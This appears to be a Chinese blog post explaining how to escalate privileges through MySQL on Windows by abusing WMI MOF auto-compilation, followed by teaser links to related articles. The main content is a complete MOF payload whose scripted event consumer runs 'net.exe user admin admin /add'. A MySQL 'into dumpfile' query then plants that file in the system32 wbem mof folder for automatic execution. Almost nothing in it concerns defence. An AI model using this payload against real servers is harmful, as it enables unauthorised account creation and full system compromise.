mysql mof提权原理_【提权】MySQL提权之MOF
0x01 前言
Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:
将MOF文件执行为命令行参数及Mofcomp.exe文件
使用IMofCompiler借口和$CompileFile方法
拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中
使用MOF提权的前提是当前root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下。
0x02 漏洞利用方法
将一下代码保存为nullevt.mof文件
#pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
通过MySQL查询将文件导入
select load_file('c:\\recycler\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
导入后,系统会自动运行该文件。
mysql mof提权原理_【提权】MySQL提权之MOF相关推荐
- mysql mof提权原理_关于mysql mof提权研究
无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...
- mysql安装原理_全面解读MySQL主从复制,从原理到安装配置
为什么需要主从复制? 1.在业务复杂的系统中,有这么一个情景,有一句sql语句需要锁表,导致暂时不能使用读的服务,那么就很影响运行中的业务,使用主从复制,让主库负责写,从库负责读,这样,即使主库出现了 ...
- 深入理解MySQL主从原理_详细分析MySQL主从复制
前言: 在MySQL中,主从架构应该是最基础.最常用的一种架构了.后续的读写分离.多活高可用架构等大多都依赖于主从复制.主从复制也是我们学习MySQL过程中必不可少的一部分,关于主从复制的文章有很多, ...
- mysql数据库视图原理_详细分析mysql视图的原理及使用方法
前言: 在MySQL中,视图可能是我们最常用的数据库对象之一了.那么你知道视图和表的区别吗?你知道创建及使用视图要注意哪些点吗?可能很多人对视图只是一知半解,想详细了解视图的同学看过来哟,本篇文章会详 ...
- mysql自定义函数的优缺点_浅谈MySQL创建自定义函数漏洞的利用和防止
前一阵子网上风靡的MySQL的udf.dll提权我有所了解-近日由于不再在IDC行业工作了-所以也有所淡忘- 只是最近实在手痒,就决定对我的站点所在的服务器下手--.正好用上这招了- 站点的服务器是W ...
- mysql主从同步可靠吗_说一下mysql主从同步
首先说一下mysql主从复制支持哪些方式: 单向,双向,链式级联,实时,异步复制.在复制的时候,一台服务器充当主服务器,而一个或者多个的其他服务器充当从服务器. 一主一从: 一组多从 互为主从 还有什 ...
- mysql 8重置root密码_如何在MySQL 8中重置root密码
MySQL中的用户密码存储在用户表中,密码重置实际上是改变该表中记录的值. 要在忘记密码的情况下更改密码,我们的想法是绕过MySQL的身份验证进入系统并使用SQL命令更新记录密码值. 在MySQL 5 ...
- mysql 跳表 b 树_简单谈谈Mysql索引与redis跳表
摘要 面试时,交流有关mysql索引问题时,发现有些人能够涛涛不绝的说出B+树和B树,平衡二叉树的区别,却说不出B+树和hash索引的区别.这种一看就知道是死记硬背,没有理解索引的本质.本文旨在剖析这 ...
- mysql update多个字段_常见的MySQL命令大全fourth
1:使用SHOW语句找出在服务器上当前存在什么数据库: mysql> SHOW DATABASES; 2:2.创建一个数据库MYSQLDATA mysql> Create DATABASE ...
- mysql动力节点百度云_动力节点MySQL数据库视频 百度云 网盘 下载
资源名称:动力节点MySQL数据库视频 百度云 网盘 下载 # o4 E. q% ]2 ?百度网盘下载链接:[/hide]- t4 L+ S# b2 T( }! d) n& d 密码:dff7 ...
最新文章
- AI算力需求6年增长30万倍,「超异构计算」才能满足下一个10年
- ASP.NET MVC视图引擎SPARK文档中文版
- 办公技巧:Excel下拉菜单小技巧,赶紧学一下!
- python海龟绘图画树_Python:海龟绘图(二)
- Oracle DBA的SQL编写技能提升宝典(含SQL资源)
- C ++ 数组 | 寻找最大、最小值,数组(Array)_1
- mysql libc.so.6_解决安装mysql动态库libstdc++.so.6、libc.so.6版本过低问题
- java xml stax_Java StAX解析器示例以读取XML文件
- Xml 学习 ---引自MSDN CHINA
- Setup Factory打包winform程序
- robotframework 内置库DateTime,Dialogs,
- (MDY)2021秋季软件工程 alpha冲刺完善
- hyper-v 网桥_使用网桥简化网络-使FIO ActionTec MI424-WR成为网桥
- 自己写的基金投资分析系统,这只基你们觉得怎么样?
- Android中DialogFragment自动弹出输入法
- outlook邮箱邮件大小限制_outlook 附件大小限制
- TIA博途中分布式IO ET200SP的使用方法
- JS保留最多两位小数
- python bz2模块
- 【大数据】季节性模型概述